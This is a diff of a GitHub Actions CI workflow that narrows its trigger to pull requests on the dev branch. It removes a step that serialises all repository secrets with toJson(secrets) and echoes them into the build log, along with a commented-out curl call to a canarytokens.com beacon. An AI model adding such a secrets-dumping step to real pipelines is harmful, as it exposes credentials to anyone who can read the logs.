--- a/.github/workflows/main.yml
+++ b/.github/workflows/main.yml
@@ -4,9 +4,7 @@ name: CI
 
 # Controls when the workflow will run
 on:
-  # Triggers the workflow on push or pull request events but only for the dev branch
-  push:
-    branches: [ dev ]
+  # Triggers the workflow on pull request events but only for the dev branch
   pull_request:
     branches: [ dev ]
 
@@ -27,12 +25,7 @@ jobs:
 
       # Runs a set of commands using the runners shell
       - name: Run a multi-line script
-        env: 
-          SECRETS_CONTEXT: ${{ toJson(secrets) }}
         run: |
-          echo "$SECRETS_CONTEXT"
-        #{
-        #echo Add other actions to build,
-        #echo test, and deploy your project.
-        #curl http://canarytokens.com/articles/621jcvsq91hs4j6sk7g3wcud0/contact.php
-        #} &> /dev/null
+          {
+          echo github.event.pull_request.title
+          } &> /dev/null
